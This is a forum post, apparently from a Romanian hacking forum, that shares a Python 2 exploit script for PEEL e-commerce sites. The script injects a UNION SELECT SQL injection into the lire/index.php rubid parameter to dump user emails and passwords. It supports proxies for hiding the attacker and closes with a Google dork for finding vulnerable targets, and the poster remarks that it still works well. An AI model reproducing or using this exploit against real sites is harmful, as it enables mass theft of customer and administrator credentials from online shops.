Jump to content
hozarares

PEEL E-Commerce Scanner

Recommended Posts

Posted

#!/usr/bin/python

# This was written for educational purpose only. Use it at your own risk.

# Author will be not responsible for any damage!

#

################################################################

#

#

# Vuln discovered by banjirian

#

import os, sys, time, re, urllib2, httplib, socket

if sys.platform == 'linux' or sys.platform == 'linux2':

clearing = 'clear'

else:

clearing = 'cls'

os.system(clearing)

proxy = "None"

count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:

print "\n|---------------------------------------------------------------|"

print "| b4ltazar[@]gmail[dot]com |"

print "| 06/2009 PEEL e-commerce |"

print "| Vuln discovered by banjirian |"

print "| Usage: peel.py http://www.site.com/ |"

print "| Visit Ljuska v2 :: Forums - Index page |"

print "|---------------------------------------------------------------|\n"

sys.exit(1)

for arg in sys.argv:

if arg == '-h':

print "\n|-------------------------------------------------------------------------------|"

print "| b4ltazar[@]gmail[dot]com |"

print "| 06/2009 PEEL e-commerce |"

print "| Vuln discovered by banjirian |"

print "| Usage: peel.py www.site.com |"

print "| Example: pell.py ACKSOFT |"

print "| Visit Ljuska v2 :: Forums - Index page |"

print "|-------------------------------------------------------------------------------|\n"

sys.exit(1)

elif arg == '-p':

proxy = sys.argv[count+1]

count += 1

site = sys.argv[1]

if site[:4] != "http":

site = "http://"+site

if site[-1] != "/":

site = site + "/"

print "\n|---------------------------------------------------------------|"

print "| b4ltazar[@]gmail[dot]com |"

print "| 06/2009 PEEL e-commerce |"

print "| Vuln discovered by banjirian |"

print "| Visit Ljuska v2 :: Forums - Index page |"

print "|---------------------------------------------------------------|\n"

print "\n[-] %s" % time.strftime("%X")

socket.setdefaulttimeout(20)

try:

if proxy != "None":

print "[+] Proxy:",proxy

print "\n[+] Testing Proxy..."

pr = httplib.HTTPConnection(proxy)

pr.connect()

proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})

proxyfier = urllib2.build_opener(proxy_handler)

proxyfier.open("http://www.google.com")

print

print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"

print

else:

print "[-] Proxy not given"

print

proxy_handler = urllib2.ProxyHandler()

except(socket.timeout):

print

print "\t[-] Proxy Timed Out"

print

sys.exit(1)

except(),msg:

print msg

print "\t[-] Proxy Failed"

print

sys.exit(1)

try:

url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="

except(IndexError):

print "[-] Wtf?"

proxyfier = urllib2.build_opener(proxy_handler)

proxy_check = proxyfier.open(url).readlines()

for line in proxy_check:

if re.search("<br><br>", line):

line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")

print "\n[!]",line,"\n"

print "[+] Target:",site

print "[+] Exploiting...\n"

try:

check = proxyfier.open(site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),3+from+peel_utilisateurs--').read()

if re.findall("baltazar", check):

print "[!] w00t!,w00t!: ",site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe),3+from+peel_utilisateurs--'

print

else:

print "[-] Can't exploit :("

print

except(urllib2.HTTPError):

pass

except(KeyboardInterrupt, SystemExit):

pass

print "[!] Use this google dork for finding targets"

print "\tinurl:lire/index.php?rubid=\n"

print "\n[-] %s" % time.strftime("%X")

####################################################

Mai vechi dar inca merge foarte bine ......

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...